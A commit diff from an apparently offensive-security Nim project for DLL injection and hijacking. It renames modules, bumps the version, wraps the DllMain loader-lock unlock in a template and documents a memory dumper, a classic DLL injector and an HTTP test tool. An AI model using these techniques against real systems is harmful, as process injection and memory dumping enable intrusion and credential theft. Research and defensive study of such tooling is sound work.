code cleanup 3

README.md

@@ -69,9 +69,19 @@ nim --cpu:i386 -d:release c src\parasite.nim
 * This project has been flagged as potentially malicious by certain antivirus vendors. This is likely because it has previously been weaponized and submitted to VT.
 * The WMI module is still under development
 
+## Tools
+
+This project includes additional tools for testing its functionalities independently of DLL hijacking techniques.
+
+|Tool|Description|
+|-|-|
+|`dumper.exe`|Dumps process memory using the `MiniDumpWriteDump` function.|
+|`injector.exe`|Injects a DLL of your choice into a specified process via classic DLL injection.|
+|`parahttp.exe`|Allow for testing web application features independently of any DLL injections|
+
 ---
 
 **This project draws inspiration from:**
 
 * The amazing [OffensiveNim](https://github.com/byt3bl33d3r/OffensiveNim) repository.
-* Loader Lock unlocking technique haveily inspired on work of [@ElliotKillick](https://github.com/ElliotKillick) especially his [LdrLockLiberator](https://github.com/ElliotKillick/LdrLockLiberator) repository.
+* The Loader Lock unlocking technique is heavily inspired by the work of [@ElliotKillick](https://github.com/ElliotKillick), particularly his [LdrLockLiberator](https://github.com/ElliotKillick/LdrLockLiberator) repository.

parasite.nimble

@@ -1,6 +1,6 @@
 # Package
 
-version       = "0.4.0"
+version       = "0.4.1"
 author        = "srozb"
 description   = "dll injection/hijack made fun"
 license       = "MIT"
@@ -10,7 +10,7 @@ binDir        = "release"
 namedBin = {
     "parasite"  : "parasite.dll", 
     "injector"  : "injector.exe", 
-    "httpserv"  : "para_http.exe",
+    "parahttp"  : "parahttp.exe",
     "dumper"    : "dumper.exe"
 }.toTable()
 

src/dumper.nim

@@ -1,7 +1,7 @@
 when isMainModule:
   import os
   import strutils
-  import parasite/dumper
+  import parasite/procdump
   if paramCount() != 2:
     echo "usage: dumper <pid> <dump filename>"
     quit(-1)

src/injector.nim

@@ -1,7 +1,7 @@
 when isMainModule:
   import os
   import strutils
-  import parasite/injector
+  import parasite/dllinject
 
   if paramCount() != 2:
     echo "usage: injector <pid> <dll>"

src/parasite.nim

@@ -14,17 +14,17 @@ proc DllMain(hinstDLL: HINSTANCE, fdwReason: DWORD, lpvReserved: LPVOID): BOOL {
   NimMain()
 
   when defined(unlockloader):
-    unlockLoaderLock()
-    var hThread = CreateThread(
-      cast[LPSECURITY_ATTRIBUTES](NULL), 
-      0.SIZE_T, 
-      cast[LPTHREAD_START_ROUTINE](runHttpServ), 
-      cast[LPVOID](NULL), 
-      0.DWORD, 
-      cast[LPDWORD](NULL)
-    )
-    WaitForSingleObject(hThread, 20000.DWORD)
-    lockLoaderLock()
+    withLoaderUnlocked:
+      let hThread = CreateThread(
+        cast[LPSECURITY_ATTRIBUTES](NULL), 
+        0.SIZE_T, 
+        cast[LPTHREAD_START_ROUTINE](runHttpServ), 
+        cast[LPVOID](NULL), 
+        0.DWORD, 
+        cast[LPDWORD](NULL)
+      )
+      if hThread == NULL: return false
+      WaitForSingleObject(hThread, 20000.DWORD)
   else:
     runHttpServ()
 

src/parasite/httpserv.nim

@@ -8,12 +8,12 @@ import shell
 import environ
 import strtabs
 import net
-import injector
+import dllinject
 import strutils
 when defined(wmi):
   import wmi
 when defined(dumper):
-  import dumper
+  import procdump
 
 proc pickPort(minPort = 5000, tries=64): Port {.inline.} =
   ## Try to bind a port to determine if it can be used by http module. If port

src/parasite/lockpick.nim

@@ -30,4 +30,9 @@ proc lockLoaderLock*() =
     res = LdrLockLoaderLock(0.ULONG, disp, addr newCookie)
   if res == 0: 
     discard "LoaderLock locked, obtained cookie: 0x" & newCookie.toHex
-  else: discard "Failed with: 0x" & res.toHex
+  else: discard "Failed with: 0x" & res.toHex
+
+template withLoaderUnlocked*(body: untyped) = 
+  unlockLoaderLock()
+  body
+  lockLoaderLock()